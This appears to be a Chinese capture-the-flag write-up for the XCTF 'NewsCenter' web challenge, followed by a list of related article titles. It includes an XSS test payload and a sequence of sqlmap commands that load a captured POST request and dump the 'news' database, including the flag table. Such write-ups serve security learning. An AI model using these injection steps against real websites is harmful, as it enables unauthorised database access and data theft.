题目:NewsCenter

目标:

bp的使用
sqlmap的post注入

Writeup

分析:

  • 首先打开目标网址,发现有个搜索框,于是猜测是否存在sql注入或者xss

  • sql注入测试:搜索框中随便输入一个1
    url栏没有请求参数,无论怎么测试页面都没有返回值

  • xss测试:页面也是没有返回值,并且根据源码可以看出,js代码是没有被过滤的,但却利用失败,所以这里就不存在xss漏洞

<script>alert(1)</script>

  • 请求参数去哪了呢?于是又猜测是否是POST请求,我们打开bp,进行抓包查看,哎,有情况

sqlmap自动化注入

  • 我们将这个request请求保存为xctfrequest.txt,使用sqlmap进行自动注入

参数 文本文件
-r REQUESTFILE Load HTTP request from a file

sqlmap -r xctfrequest.txt --dbs

  • 发现存在POST注入,继续深入~
sqlmap -r xctfrequest.txt -D news --tables
sqlmap -r xctfrequest.txt -D news -T secret_table  --columns
sqlmap -r xctfrequest.txt -D news -T secret_table -C "id,fl4g" --dump
  • 当然你也可以一次性把new数据库内的内容全部爆出来,这样就不用一步步找flag在哪了,直接了当,所以对于有目的,好寻找的我们可以使用第一种步步深入;如果比较难找,就第二种方法比较好
sqlmap -r xctfrequest.txt -D news --dump

XCTF-高手进阶区:NewsCenter相关推荐

  1. 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth)WriteUp

    文章目录 解题部分 总结: 解题部分 题目来源 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth) 1.拿到题目以后,发现是一个index.php的页面,并且设备-没有显示 ...

  2. 攻防世界 web高手进阶区 10分题 weiphp

    前言 继续ctf的旅程 开始攻防世界web高手进阶区的10分题 本文是weiphp的writeup 解题过程 进入界面 点击 进入一个登陆界面 没有注册 那肯定得找源码了 惯例源码+御剑 发现git泄 ...

  3. 攻防世界-web高手进阶区

    文章目录 攻防世界-web高手进阶区 1.baby_web 2.Training-WWW-Robots 3.Web_php_include (文件包含+伪协议) 1.方法 2.方法 4.ics-06( ...

  4. 攻防世界 Reverse高手进阶区 2分题 reverse-for-the-holy-grail-350

    前言 继续ctf的旅程 攻防世界Reverse高手进阶区的2分题 本篇是reverse-for-the-holy-grail-350的writeup 发现攻防世界的题目分数是动态的 就仅以做题时的分数 ...

  5. 攻防世界 web高手进阶区 9分题 favorite_number

    前言 继续ctf的旅程 开始攻防世界web高手进阶区的9分题 本文是favorite_number的writeup 解题过程 进入界面 简单的代码审计 首先是个判断,既要数组强等于,又要首元素不等 然 ...

  6. 攻防世界 Crypto高手进阶区 3分题 wtc_rsa_bbq

    前言 继续ctf的旅程 攻防世界Crypto高手进阶区的3分题 本篇是wtc_rsa_bbq的writeup 发现攻防世界的题目分数是动态的 就仅以做题时的分数为准了 解题过程 得到一个无后缀文件 扔 ...

  7. 攻防世界高手进阶区——dice_game

    攻防世界高手进阶区--dice_game 题目里面啥都没有. 一.分析文件 checksec 只有栈溢出保护关闭了,其他都是开着的. 运行 可以看出是要猜数字,猜对50次. ida逆向 __int64 ...

  8. 攻防世界高手进阶区 ——forgot

    攻防世界高手进阶区 --forgot 看了半天,啥也没看懂,做出来了才发现啥也不是. 一,分析文件 checksec 还好,只开启了堆栈不可执行. 运行一下 翻译了一下,应该是判断邮箱是否合乎规矩. ...

  9. forgot [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列13

    题目地址:forgot 本题是高手进阶区的第二题,恭喜大家已经进入高手行列!好假好假,哈哈哈! 废话不说,看看题目先 这个题目有很长的描述,但是都是废话,不去管他了. 照例下载附件,做下安全检查 ro ...

  10. 攻防世界 Crypto高手进阶区 3分题 你猜猜

    前言 继续ctf的旅程 攻防世界Crypto高手进阶区的3分题 本篇是你猜猜的writeup 发现攻防世界的题目分数是动态的 就仅以做题时的分数为准了 解题过程 得到一串16进制 504B03040A ...

最新文章

  1. Java并发编程的基础-其他的线程复位
  2. 剑指offer之21-25题解
  3. 后Kubernetes时代的微服务
  4. BCB 连接数据库和查询数据
  5. 吴恩达机器学习作业4(python实现)
  6. r语言岭回归参数选择_78-预测分析-R语言实现-岭回归与LASSO回归
  7. 信号与线性系统管致中第六版pdf_第五讲 信号流图
  8. video.js插件的使用
  9. VSCode小说神器Thief-Book-VSCode页数获取
  10. JS表单验证Email地址
  11. Evolutionary algorithm (遗传算法)介绍
  12. 独行侠作风之CRM实施阻力
  13. Sunday算法流程与代码
  14. Mysql中自定义函数的创建和执行
  15. 示波器探头基本知识详解
  16. 任天堂服务器维护2021,《怪物猎人:崛起》太火爆 任天堂服务器紧急维护
  17. raid 物理盘缓存状态_Dell PowerEdge系列服务器RAID和物理磁盘开机自检错误信息及说明...
  18. 除了iPhone 还有哪些能确保信息安全的手机?
  19. STM32 无刷电机BLDC 1KW带刹开发板 PDF原理图 源代码 MDK源码
  20. 计算100以内所有奇数的和以及所有偶数的和

热门文章

  1. 总结:华科教授给本校2013级计算机学院硕士生论文提的几点意见
  2. 网站开发流程-WEB开发的流程
  3. d3.js中选择元素和绑定数据
  4. Redis cluster原理
  5. Scala:Function1、Function2
  6. Elasticsearch Java 操作client
  7. FastThreadLocal原理
  8. javaweb学习总结(二十四):jsp传统标签开发
  9. [bzoj2242][SDOI2011]计算器
  10. 接口测试基础之入门篇(待续)